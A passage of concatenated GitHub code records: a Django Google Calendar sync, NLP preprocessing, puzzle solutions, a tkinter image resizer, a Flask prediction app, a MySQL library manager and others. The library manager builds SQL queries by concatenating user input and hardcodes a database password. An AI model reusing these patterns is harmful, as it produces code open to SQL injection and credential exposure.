event.end_time:\n        event.end_time = datetime.datetime.min.time()\n    if not event.start_time:\n        event.start_time = datetime.datetime.min.time()\n    if event.end_date < event.start_date:\n        event.end_date, event.start_date = event.start_date, event.end_date\n    queryset = Event.objects.filter(\n        id=event.id\n    ) # https://stackoverflow.com/questions/1555060/how-to-save-a-model-without-sending-a-signal\n    # this is used so that we can update the google event within this handler without re-triggering the signal (signals fire every time an object is saved)\n    event = {\n        \"summary\": event.description,\n        \"location\": event.location or \"\",\n        \"description\": (event.description + \" \" + event.summary),\n        \"start\": {\n            \"dateTime\": datetime.datetime.combine(\n                event.start_date, event.start_time\n            ).isoformat(),\n            \"timeZone\": \"Europe/Amsterdam\",\n        },\n        \"end\": {\n            \"dateTime\": datetime.datetime.combine(\n                event.end_date, event.end_time\n            ).isoformat(),\n            \"timeZone\": \"Europe/Amsterdam\",\n        },\n        \"recurrence\": [],\n        \"reminders\": {},\n    }\n\n    if created or not instance.google_link:\n        try:\n            event = (\n                service.events()\n                .insert(\n                    calendarId=os.environ.get(\"calendarId\"),\n                    body=event,\n                )\n                .execute()\n            )\n            queryset.update(google_link=event[\"id\"])\n        except HttpError as error:\n            # print(\"An error occurred: %s\" % error)\n            pass\n    else:\n        try:\n            event = (\n                service.events()\n                .update(\n                    calendarId=os.environ.get(\"calendarId\"),\n                    body=event,\n                    eventId=instance.google_link,\n                )\n                .execute()\n            )\n            queryset.update(google_link=event[\"id\"])\n        except HttpError as error:\n            # print(\"An error occurred: %s\" % error)\n            pass\n    # print(\"#############ADDED NEW #############\")\n\n\ndef delete_event(sender, instance, **kwargs):\n    \"\"\"Delete the event from Google Calendar when it is deleted on the website.\"\"\"\n    try:\n        service = get_service()\n        service.events().delete(\n            calendarId=os.environ.get(\"calendarId\"),\n            eventId=instance.google_link,\n        ).execute()\n    except:\n        pass\n\n\npost_save.connect(handle_event, sender=Event)\npost_delete.connect(delete_event, 
sender=Event)\n","repo_name":"zelhus-iliyas/test-api","sub_path":"new/clientusers/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34216660513","text":"import nltk\nimport pandas as pd\nfrom pandas import DataFrame\nimport re\nimport numpy as np\n\n\n# Data Processing\ndef to_lowercase(words):\n\n    \"\"\"Convert all characters to lowercase from list of tokenized words\n    Args: A list of words to be processed\n    Returns: A list of processed words\"\"\"\n\n    new_words = []\n    for word in words:\n        new_word = word.lower()\n        new_words.append(new_word)\n    return new_words\n\ndef remove_punctuation(words):\n\n    \"\"\"Remove punctuation from list of tokenized words\n    Args: A list of words to be processed\n    Returns: A list of processed words\"\"\"\n\n    new_words = []\n    for word in words:\n        new_word = re.sub(r'[^\\w\\s]','', word)\n        if new_word != '':\n            new_words.append(new_word)\n    return new_words\n\ndef data(df):\n\n    \"\"\"Split the essays into reference answers (those with the top score per essay set)\n    and candidate answers, returning tokenized corpora, ids, scores and the max scores.\"\"\"\n    essay_set_list = (df['EssaySet'].unique())\n    max_score_list = []\n    for i in essay_set_list:\n        max_score_list.append(df[df['EssaySet']==i]['Score1'].max())\n        # print('Max score for essay {} is {}'.format(i, max_score_list[i-1]))\n\n\n    reference = pd.DataFrame()\n    candidates = pd.DataFrame()\n\n    for i in essay_set_list:\n        ref = df[(df['EssaySet']==i) & (df['Score1']==max_score_list[i-1])]\n        ref_list = [reference, ref]\n        reference = pd.concat(ref_list)\n        cands = df[(df['EssaySet']==i) & (df['Score1']!=max_score_list[i-1])]\n        cand_list = [candidates, cands]\n        candidates = pd.concat(cand_list)\n\n\n    total_ref = reference.count()[0]\n    total_cand = candidates.count()[0]\n    # print(total_ref, total_cand, total_ref+total_cand)\n\n    essay_set_list_ref = (reference['EssaySet'].unique())\n    essay_set_list_cand = (candidates['EssaySet'].unique())\n    # print(essay_set_list_ref, essay_set_list_cand)\n\n\n    ref = df.loc[(df['Score1']==1) & (df['EssaySet']!=3)]\n    # ref.head(5)\n    # ref.loc[0]['EssaySet']\n\n\n    # Generating the corpus\n\n    reference_corpus = []\n    candidate_corpus = []\n    reference_id = []\n    candidate_id = []\n    candidate_scores = []\n\n    for i in essay_set_list:\n        ref = reference.loc[reference['EssaySet']==i]\n        cand = candidates.loc[candidates['EssaySet']==i]\n        \n        count_ref = ref.count()[0]\n        count_cand = cand.count()[0]\n        \n        ref_list = []\n        cand_list = []\n        cand_id = []\n        ref_id = []\n        score = []\n        \n        for j in range(count_ref):\n            ref_list.append(list(ref.iloc[j]['EssayText'].split()))\n            ref_id.append(ref.iloc[j]['Id'])\n        ref_tuple = (i, ref_list)\n        ref_id_tuple = (i, ref_id)\n        reference_corpus.append(ref_tuple)\n        reference_id.append(ref_id_tuple)\n        \n        for j in range(count_cand):\n            cand_list.append(list(cand.iloc[j]['EssayText'].split()))\n            cand_id.append(cand.iloc[j]['Id'])\n            score.append(cand.iloc[j]['Score1'])\n        cand_tuple = (i, cand_list)\n        cand_id_tuple = (i, cand_id)\n        score_tuple = (i, score)\n\n        candidate_corpus.append(cand_tuple)\n        candidate_id.append(cand_id_tuple)\n        candidate_scores.append(score_tuple)\n\n    reference_corpus = dict(reference_corpus)\n    candidate_corpus = dict(candidate_corpus)\n    reference_id = dict(reference_id)\n    candidate_id = dict(candidate_id)\n    candidate_scores = dict(candidate_scores)\n\n\n    reference_corpus = list(reference_corpus.values())\n    candidate_corpus = list(candidate_corpus.values())\n    reference_id = list(reference_id.values())\n    candidate_id = list(candidate_id.values())\n    candidate_scores = 
list(candidate_scores.values())\n\n\n\n    new_reference_corpus = []\n    new_candidate_corpus = []\n\n    for i in essay_set_list:\n        ref_list = []\n        cand_list = []\n        for j in range(len(reference_corpus[i-1])):\n            ref_list.append(to_lowercase(remove_punctuation(reference_corpus[i-1][j])))\n        for j in range(len(candidate_corpus[i-1])):\n            cand_list.append(to_lowercase(remove_punctuation(candidate_corpus[i-1][j])))\n        ref_tuple = (i, ref_list)\n        cand_tuple = (i, cand_list)\n        new_reference_corpus.append(ref_tuple)\n        new_candidate_corpus.append(cand_tuple)\n\n    new_reference_corpus = dict(new_reference_corpus)\n    new_candidate_corpus = dict(new_candidate_corpus)\n\n\n    reference_corpus = list(new_reference_corpus.values())\n    candidate_corpus = list(new_candidate_corpus.values())\n\n    return reference_corpus, candidate_corpus, reference_id, candidate_id, candidate_scores, max_score_list\n\ndef wmt_data_refs(words):\n    words = words.split()\n    newlist = []\n    newlist.append((remove_punctuation(to_lowercase(words))))\n    return newlist\n\ndef wmt_data_cands(words):\n    words = words.split()\n    return remove_punctuation(to_lowercase(words))\n\n","repo_name":"EshwarSR/AutomaticEvaluationMetrics","sub_path":"2_BLEU/SAS_processing.py","file_name":"SAS_processing.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2541757097","text":"'''\n    Probably the hardest problem so far.\n    It is what got me studying backtracking (starting from n-queens basics).\n    + It also took quite a while to come up with code that handles word and cards having different lengths... \n'''\nfrom collections import defaultdict\ndef solution(word, cards):\n\n    answer = 0\n    word_length = len(word)\n    cards_length = len(cards)\n    if word_length > cards_length:\n        return 0\n\n    word_counter = defaultdict(int) # 1. letter-count tracker - looking back now (2022-03-28), this is key idea 1\n    for w in word :\n        word_counter[w]+=1 \n    column_visitor = defaultdict(bool) # 2. column-visited tracker\n\n    def find(word_index=0, row=0):\n\n        nonlocal answer # 3. the nonlocal keyword is handy - lets us use the outer answer\n        if word_index == word_length:\n            answer+=1\n            return \n\n        if row == cards_length:\n            return \n\n        for i, c in enumerate(cards[row]):\n\n            if column_visitor[i] or word_counter[c]==0: \n                continue\n            \n            # the case where we pick this card\n            column_visitor[i]=True\n            word_counter[c]-=1\n            find(word_index+1, row+1)\n            column_visitor[i]=False\n            word_counter[c]+=1\n\n        # (2022-03-29) wow, this is hard....\n        # key idea 2 - must handle cases like example 3 / when word and cards differ in length -> this was tough.\n        # if word and cards are the same length, the call below isn't needed, and neither are lines 22-23\n        find(word_index, row+1) # consume nothing from word, just move down one row - needs lines 22 and 23 \n    find()\n    return answer\n\n# problem: find word in cards / one character per row, the same column cannot be reused. 
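(NOTE, added: depth-first search over rows with pruning on visited columns and remaining letter counts; the inner find(word_index, row+1) call lets a row be skipped)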
\nprint(solution(word = \"APP\" , cards = [\"AVV\", \"XPP\", \"XPP\"])) # 1 - 예제1\nprint(solution(word = \"APPLE\" , cards = [\"LLZKE\", \"LCXEA\", \"CVPPS\", \"EAVSR\", \"FXPFP\"])) # 3 - 예제2\nprint(solution(word = \"BAB\" , cards = [\"ZZBZ\", \"BAZB\", \"XBXB\", \"XBAX\"])) # 4 - 예제3 / 아 이것도 만만치 않네.\n\n\n","repo_name":"DeepFocuser/Algorithm_Study","sub_path":"programmers/backtracking_카드게임_hard.py","file_name":"backtracking_카드게임_hard.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9853715095","text":"\"\"\"\nClaim typings\n\"\"\"\n\nfrom typing import Dict, Union, TypedDict\n\n\nclass ClaimField(TypedDict):\n name: str\n value: str\n\n\nClaimFields = list[ClaimField]\n\n\nclass ClaimFieldsInput(TypedDict):\n fields: ClaimFields\n\n\nclass ClaimRequest(TypedDict):\n address: str\n signature: str\n nonce: str\n reward_id: str\n reward_claim_values: ClaimFieldsInput\n\n\nclass ClaimVerificationResponse(TypedDict):\n # tier: Dict[str, Union[str, Dict[str, str]]]\n claimable: bool\n","repo_name":"SongADAO/songaday-rewards-api","sub_path":"app/claim/typings.py","file_name":"typings.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2672310958","text":"import threading\nimport time\ndef green_light(pattern,rlock):\n rlock.acquire()\n if pattern==0:\n print('Green light-Go!')\n time.sleep(1)\n rlock.release()\ndef yellow_light(pattern,rlock):\n rlock.acquire()\n if pattern==1:\n print('Yellow light-Prepare to stop!')\n time.sleep(1)\n rlock.release()\ndef red_light(pattern,rlock):\n rlock.acquire()\n if pattern==2:\n print('Red light-Stop!')\n time.sleep(1)\n rlock.release()\npatterns=[0,1,2]\nrlock=threading.RLock()\nfor pattern in patterns:\n t1=threading.Thread(target=green_light,args=(pattern,rlock))\n t2=threading.Thread(target=yellow_light,args=(pattern,rlock))\n t3=threading.Thread(target=red_light,args=(pattern,rlock))\n t1.start()\n t2.start()\n t3.start()\n t1.join()\n t2.join()\n t3.join()","repo_name":"Riazul7/Assignment-Project","sub_path":"Assignment-7/C718.py","file_name":"C718.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12477455021","text":"import math, random\n\ntab32 = [\n 0, 9, 1, 10, 13, 21, 2, 29,\n 11, 14, 16, 18, 22, 25, 3, 30,\n 8, 12, 20, 28, 15, 17, 24, 7,\n 19, 27, 23, 6, 26, 5, 4, 31]\n\ndef simulation_log2(value:int) -> int:\n value |= value >> 1\n value |= value >> 2\n value |= value >> 4\n value |= value >> 8\n value |= value >> 16\n idx = (int(value * 0x07C4ACDD) & 0xFFFF_FFFF) >> 27\n return tab32[idx]\n\ndef _zerofind(value:int) -> int:\n ret = 0\n rev = list(range(32))[::-1]\n for i in rev:\n if (value >> i) & 0x0000_0001 == 0x0000_0000:\n ret += 1\n else:\n break\n return ret\n\ndef simulation_div(x:int, D:int, N:int) -> int:\n # k = x + math.ceil(simulation_log2(D))\n k = x + (x - _zerofind(D-1)) # ceil(log2(D)) = N - LDZ(D-1)\n # a = math.ceil((2**k)/D) - (2**x)\n a = (((1 << k) + ((D>>1)+1)) // D) - (1 << x)\n\n # b = math.floor((N * a) / (2**x))\n b = (N * a) >> x\n # print(k, N, a, b)\n\n # result = math.floor((math.floor((N-b)/2) + b) / (2**(k-x-1)))\n result = (((N-b)>>1) + b) >> (k-x-1)\n\n return result\n\ndef random_test(tc:int) -> None:\n tc_num = tc\n fails = 0\n while tc_num:\n \n to_div = random.randint(0,255)\n divisor = 
random.randint(1,100000) # lower bound 1 so the divisor is never zero\n        divisor_round = divisor >> 1\n        validate = ((to_div*255)+divisor_round) // divisor\n        if (validate > 255):\n            continue\n\n        ref = ((to_div*255)+divisor_round) // divisor\n        out = simulation_div(32, divisor, to_div)\n\n        if ref != out:\n            fails += 1\n\n        tc_num -= 1\n    print(f\"{fails} / {tc} Failed\")\n\n\nif __name__ == \"__main__\":\n    \n    # for unsigned 32 bits\n    x = 32\n    D = 90781\n    N = 178 * 255 + (D>>1)\n    # D = 883\n    # N = 30022\n    result = simulation_div(x, D, N)\n    print(result)\n\n    random_test(100)\n\n\n\n","repo_name":"ljwoo94/CalculationOpt","sub_path":"div_simulation.py","file_name":"div_simulation.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33596962441","text":"class Solution(object):\n    def countGoodSubstrings(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        count = 0\n        \n        for i in range(2, len(s)):\n            currentSubstring = s[i-2:i+1] # get three chars\n            uniqueSet = set(currentSubstring)\n            if len(uniqueSet) == 3:\n                count += 1\n        \n        return count\n        ","repo_name":"tinatran079/leetcode","sub_path":"1876-substrings-of-size-three-with-distinct-characters/1876-substrings-of-size-three-with-distinct-characters.py","file_name":"1876-substrings-of-size-three-with-distinct-characters.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33990221611","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom PIL import Image, ImageTk\r\nimport PIL.Image\r\n\r\nfrom tkinter import *\r\nimport tkinter.filedialog\r\nimport tkinter.messagebox\r\nimport os\r\n\r\nif __name__ == '__main__':\r\n\t\r\n\troot = Tk()\r\n\troot.title(\"Klim[ON]_image_resizer_1.0\")\r\n\troot.geometry(\"680x500\")\r\n\troot.resizable(False, False)\r\n\t\r\nlinks = []\r\nlink_replace = \"\"\r\nfinal_width = 694\r\nfinal_heigh = 521\r\n\r\ncrop_left = 0\r\ncrop_right = 0\r\ncrop_top = 0\r\ncrop_bottom = 0\r\n\r\n\r\n#=============open files===============================================\t\r\n\t\r\n\r\n\r\ndef open_files(): \r\n\t\r\n\tbutton_2['state'] = 'normal'\r\n\tbutton_3['state'] = 'normal'\r\n\r\n\tfilez = tkinter.filedialog.askopenfilenames(parent=root, initialdir = \"/\",title = \"Select file\",filetypes = ((\"jpeg, bmp and png files\",\"*.jpg *.bmp *.png\"),(\"all files\",\"*.*\")))\r\n\t\r\n\tglobal links\r\n\tlinks = list(filez)\r\n\treturn links\r\n\r\n\r\n#==============================convert==================================\t\r\n\r\n\r\n\r\ndef convert():\r\n\t\r\n\tbutton_2['state'] = 'disabled'\r\n\t\r\n\tnum_of_files = 0\r\n\ta = int(enyry_1.get())\r\n\tb = int(enyry_2.get())\r\n\t\r\n\tsave_filez = tkinter.filedialog.askdirectory() # ask for the directory to save into\r\n\t\r\n \r\n\tfor link in links:\r\n\t\tnum_of_files = num_of_files+1\r\n\t\tos.path.split(link)\r\n\t\tfile_name = os.path.split(link)[1]\r\n\t\tlink_replace = link.replace('/',r'\\\\')\r\n\t\tfoo = PIL.Image.open(str(link_replace))\r\n\t\tprint(foo)\r\n\t\t# I downsize the image with an ANTIALIAS filter (gives the highest quality)\r\n\t\t\r\n\r\n\t\tfoo = foo.resize((a,b),PIL.Image.ANTIALIAS)\r\n\r\n\t\tnew_save_filez = save_filez.replace('/',r'\\\\')\r\n\t\t\r\n\t\tif '.jpg' in link_replace:\r\n\t\t\t#new_path = link_replace.replace('.jpg','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(resized)'+str(file_name),optimize=True,quality=95) # jpeg into jpeg\r\n\r\n\t\telif '.bmp' in 
link_replace:\r\n\t\t\t#new_path = link_replace.replace('.bmp','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(resized)'+str(file_name),optimize=True,quality=95)\r\n\t\telif '.png' in link_replace:\r\n\t\t\t#new_path = link_replace.replace('.png','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(resized)'+str(file_name),optimize=True,quality=95)\r\n\ttkinter.messagebox.showinfo(\"Success\", str(num_of_files) + \" files were resized\") # show a message that everything went fine\r\n\r\n\r\n\r\n\r\n#==============================crop==================================\r\n\r\n\r\n\r\ndef crop():\r\n\r\n\tleft = int(enyry_3.get())\r\n\tright = int(enyry_4.get())\r\n\ttop = int(enyry_5.get())\r\n\tbottom = int(enyry_6.get())\r\n\t\r\n\tbutton_2['state'] = 'disabled'\r\n\t\r\n\tnum_of_files = 0\r\n\t\r\n\tsave_filez = tkinter.filedialog.askdirectory() # ask the user for a destination directory\r\n\t \r\n\tfor link in links:\r\n\t\tnum_of_files = num_of_files+1\r\n\t\tos.path.split(link)\r\n\t\tfile_name = os.path.split(link)[1]\r\n\t\tlink_replace = link.replace('/',r'\\\\')\r\n\t\t\r\n\t\tfoo = PIL.Image.open(str(link_replace))\r\n\t\t\t\t\r\n\t\twidth, height = foo.size\r\n\t\t\r\n\t\tarea = ((width+left)-width, (height+top)-height, width-right, height-bottom) # x, y of the top-left corner, x, y of the bottom-right corner\r\n\t\t\r\n\t\tfoo = foo.crop(area)\r\n\t\t\r\n\t\tnew_save_filez = save_filez.replace('/',r'\\\\')\r\n\t\t\r\n\r\n\t\tif '.jpg' in link_replace:\r\n\t\t\t#new_path = link_replace.replace('.jpg','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(cropped)'+str(file_name),optimize=True,quality=95) # jpeg into jpeg\r\n\r\n\t\telif '.bmp' in link_replace:\r\n\t\t\t#new_path = link_replace.replace('.bmp','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(cropped)'+str(file_name),optimize=True,quality=95)\r\n\t\telif '.png' in link_replace:\r\n\t\t\t#new_path = link_replace.replace('.png','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(cropped)'+str(file_name),optimize=True,quality=95)\r\n\ttkinter.messagebox.showinfo(\"Success\", str(num_of_files) + \" files were cropped\") # show a message that everything went fine\r\n\r\n\r\n\r\n\t#=================layout=========================================\r\n\r\n\r\n\r\nbutton_1 = Button(root, width=20,height=3, text=\"Open photo\", command = open)\r\nbutton_1.grid(columnspan=7,column=3, rowspan=1, pady=30, padx=5)\r\nbutton_1.bind()\r\n\r\n\r\nlabel_1 = Label(root, text='final_width (px.)') # label\r\nlabel_2 = Label(root, text='final_heigh (px.)') # label\r\n\r\nlabel_3 = Label(root, text='crop_left (px.)') # label\r\nlabel_4 = Label(root, text='crop_right (px.)') # label\r\nlabel_5 = Label(root, text='crop_top (px.)') # label\r\nlabel_6 = Label(root, text='crop_bottom (px.)') # label\r\n\r\n#enyry_1 = Entry(root) # width input field\r\n#enyry_1.insert(END, final_width) # default value\r\n#enyry_2 = Entry(root) # height input field\r\n\r\n\r\n\r\n\r\nenyry_1 = Entry(root) # width input field\r\nenyry_1.insert(END, final_width) # default value\r\nenyry_2 = Entry(root) # height input field\r\nenyry_2.insert(END, final_heigh) # default value\r\n\r\n\r\n\r\nenyry_3 = Entry(root) # crop-left input field\r\nenyry_3.insert(END, crop_left) # default value\r\nenyry_4 = Entry(root) # crop-right input field\r\nenyry_4.insert(END, crop_right) # default value\r\nenyry_5 = Entry(root) # crop-top input field\r\nenyry_5.insert(END, crop_top) # default value\r\nenyry_6 = Entry(root) # crop-bottom 
input field\r\nenyry_6.insert(END, crop_bottom) # default value\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nlabel_1.grid(row=1, padx=20,pady=30 ,sticky=E)\r\nlabel_2.grid(row=2,padx=20, sticky=E)\r\nlabel_3.grid(row=1,column=2,padx=10, sticky=E)\r\nlabel_4.grid(row=2,column=2,padx=10, sticky=E)\r\nlabel_5.grid(row=3,column=2,padx=10, sticky=E)\r\nlabel_6.grid(row=4,column=2,padx=10, sticky=E)\r\nenyry_1.grid(row=1, column=1, padx=10)\r\nenyry_2.grid(row=2, column=1, padx=10)\r\nenyry_3.grid(row=1, column=3,pady=20, padx=10)\r\nenyry_4.grid(row=2, column=3,pady=20, padx=10)\r\nenyry_5.grid(row=3, column=3,pady=20, padx=10)\r\nenyry_6.grid(row=4, column=3,pady=20, padx=10)\r\n\r\n\r\n#=====================================================================\r\n\r\n\r\n\r\n\r\n\r\nbutton_2 = Button(root, width=20,height=3, state=DISABLED, text=\"RESIZE\", command = convert)\r\nbutton_2.grid( columnspan=2, rowspan=1, pady=30, padx=100)\r\nbutton_2.bind()\r\n\r\n\r\nbutton_3 = Button(root, width=20,height=3, state=DISABLED, text=\"CROP\", command = crop)\r\nbutton_3.grid( columnspan=2,row=5,column=2 , rowspan=1, pady=40, padx=20)\r\nbutton_3.bind()\r\n\r\n\r\n\r\nroot.mainloop()","repo_name":"klimon69/Photo_resizer_and_cropper","sub_path":"Photo_resizer_and_cropper_v_1_0_1.py","file_name":"Photo_resizer_and_cropper_v_1_0_1.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"34778128166","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 8 23:15:33 2021\n\n@author: Anshuman Raj\n\"\"\"\nimport numpy as np\nimport pickle\nimport pandas as pd\nimport xgboost as xgb\nfrom flask import Flask, render_template, request\nconv_dict={0:\"Normal Bidder\",1: \"Suspicious Bidder\"}\n#making the flask app\napp = Flask('fraud_detection')\n\n\n@app.route('/')\ndef show_predict_bidder_form():\n return render_template('/predictorform.html')\n\n@app.route('/results', methods=['POST'])\ndef results():\n form = request.form\n if request.method == 'POST':\n# Loading model to compare the results\n model = pickle.load(open('model.pkl','rb'))\n Bidder_ID= request.form['Bidder_ID']\n \n#Getting the data\n sb_data=pd.read_csv(\"./data/Shill_Bidding_Dataset.csv\",header=0)\n df=sb_data.to_numpy()\n x=df[int(Bidder_ID):int(Bidder_ID)+2,3:12]\n dtest=xgb.DMatrix(x)\n num_status=model.predict(dtest)\n status=conv_dict[num_status[0]]\n#returning all the required values to result\n return render_template('resultsform.html', Bidder_ID=Bidder_ID, predicted_status=status, Bidder_Tendency=x[0][0], Bidding_Ratio=x[0][1],\n Successive_Outbidding=x[0][2],\n Last_Bidding=x[0][3],\n Winning_Ratio=x[0][7])\n\napp.run(\"localhost\", \"9999\", debug=True)","repo_name":"Anshuman-Raj/Minor_Project","sub_path":"model_loading.py","file_name":"model_loading.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2632571497","text":"print(\"*****LIBRARY MANAGEMENT SYSTEM*****\")\r\n#creating database\r\nimport mysql.connector\r\ndbs=mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"Vikh1234\",auth_plugin='mysql_native_password')\r\ncur=dbs.cursor()\r\ncur.execute(\"create database if not exists lib\")\r\ncur.execute(\"use lib\")\r\n#creating required tables\r\ncur.execute(\"create table if not exists books(bname varchar(30),bcode varchar(20),total int,subject varchar(20))\")\r\ncur.execute(\"create table if not exists issue(stname 
varchar(30),stid varchar(20),bcode varchar(20),issue varchar(30))\")\r\ncur.execute(\"create table if not exists submit(stname varchar(30),stid varchar(20),bcode varchar(20),submit varchar(30))\")\r\ndbs.commit()\r\nwhile True:\r\n print(\"\"\"\r\n1- Add book\r\n2- Issue book\r\n3- Return book\r\n4- Delete book\r\n5- Display all books\r\n\"\"\")\r\n ch=int(input(\"Enter choice:\"))\r\n if ch==1:\r\n bn=input(\"Enter book name:\")\r\n bc=input(\"Enter book code:\")\r\n total=int(input(\"Enter total books:\"))\r\n sub=input(\"Enter subject:\")\r\n cur.execute(\"insert into books values('\"+bn+\"','\"+bc+\"',\"+str(total)+\",'\"+sub+\"')\")\r\n dbs.commit()\r\n print(\"Book added successfully\")\r\n if ch==2:\r\n n=input(\"Enter name of student:\")\r\n ide=input(\"Enter student id:\")\r\n bcd=input(\"Enter book code:\")\r\n d=input(\"Enter issue date:\")\r\n cur.execute(\"insert into issue values('\"+n+\"','\"+ide+\"','\"+bcd+\"','\"+d+\"')\")\r\n cur.execute('update books set total=total-1 where bcode=\"'+str(bcd)+'\"')\r\n dbs.commit()\r\n print(\"Book issued to:\",n)\r\n if ch==3:\r\n n=input(\"Enter name of student:\")\r\n ide=input(\"Enter student id:\")\r\n bcd=input(\"Enter book code:\")\r\n d=input(\"Enter return date:\")\r\n cur.execute(\"insert into submit values('\"+n+\"','\"+ide+\"','\"+bcd+\"','\"+d+\"')\")\r\n cur.execute('update books set total=total+1 where bcode=\"'+str(bcd)+'\"')\r\n dbs.commit()\r\n print(\"Book submitted from:\",n)\r\n if ch==4:\r\n cod=input('enter book code to be deleted from record:')\r\n cur.execute('delete from books where bcode=\"'+str(cod)+'\"')\r\n dbs.commit()\r\n print('RECORD SUCCESSFULLY DELETED')\r\n if ch==5:\r\n cur.execute(\"select * from books\")\r\n for i in cur:\r\n print(i)\r\n dbs.commit()\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n","repo_name":"vikhyatii/Library-Management-System","sub_path":"LMS1.py","file_name":"LMS1.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"1659534026","text":"import sys\nsys.stdin = open('input.txt')\ninput = sys.stdin.readline\n\n\ndef chk(startY, startX, endY, endX):\n tmp = S[startY][startX]\n for y in range(startY, endY+1):\n for x in range(startX, endX+1):\n if S[y][x] != tmp:\n return -1\n return tmp\n\n\ndef dc(startY, startX, endY, endX):\n if startY == endY and startX == endX:\n print(S[startY][startX], end='')\n return\n c = chk(startY, startX, endY, endX)\n if c == '0':\n print(c, end='')\n return\n elif c == '1':\n print(c, end='')\n return\n else:\n tp = (\n (startY, startX, (startY+endY)//2, (startX+endX)//2),\n (startY, (startX+endX)//2+1, (startY+endY)//2, endX),\n ((startY+endY)//2+1, startX, endY, (startX+endX)//2),\n ((startY+endY)//2+1, (startX+endX)//2+1, endY, endX)\n )\n print('(', end='')\n for v in tp:\n dc(v[0], v[1], v[2], v[3])\n print(')', end='')\n\n\nN = int(input())\nS = [input().rstrip() for _ in range(N)]\n\ndc(0, 0, N-1, N-1)\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"윤효전/210826/1992.py","file_name":"1992.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"36404117404","text":"import requests\nimport json\n\nclass MediaGrabber:\n\n\tplaces = {\"tokyo\": (35.6895, 139.6917), \"san francisco\": (37.7833, 122.4167), \"facebook\": (37.484666, 122.150129)}\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef get_pics(self, lat, lng, 
count=20):\n\t\t\"\"\"\n\t\tReturns a list of media (picture urls) from a given area.\n\t\t\"\"\"\n\t\turl = \"https://api.instagram.com/v1/media/search\"\n\t\tparams = {\"client_id\": \"9a5510f048e34950bda6c0f2c87f695b\", \"lat\": lat, \"lng\": lng, \"count\": count}\n\t\tdata = requests.get(url, params=params).json()\n\n\t\tout_data = []\n\t\tfor elem in data[\"data\"]:\n\t\t\tcaption = ''\n\t\t\tif elem[\"caption\"]:\n\t\t\t\tcaption = unicode(elem[\"caption\"][\"text\"])\n\t\t\tout = {\n\t\t\t \"image_link\": elem[\"images\"][\"standard_resolution\"][\"url\"].encode('ascii', 'ignore'),\n\t\t\t \"caption\": 'CAPTION: ' + caption,\n\t\t\t \"username\": 'USER: ' + elem[\"user\"][\"username\"]\n\t\t\t } # TODO: handle emoji and other non-ASCII characters in captions more robustly\n\t\t\tout_data.append(out)\n\t\treturn out_data\n","repo_name":"jjwon0/Viewfinder","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"24714762673","text":"import random as rd\nimport pyttsx3 as pt3\nengine1 = pt3.init()\nengine1.setProperty('rate', 150)\nengine1.setProperty('volume', 0.9)\nwhile True:\n q = input()\n ans = ['yes', 'no', 'hohoho', 'augh']\n rans = rd.choice(ans)\n print(rans)\n engine1.say(q)\n engine1.say(rans)\n engine1.runAndWait()","repo_name":"Etishis/Console_Ben","sub_path":"ben.py","file_name":"ben.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
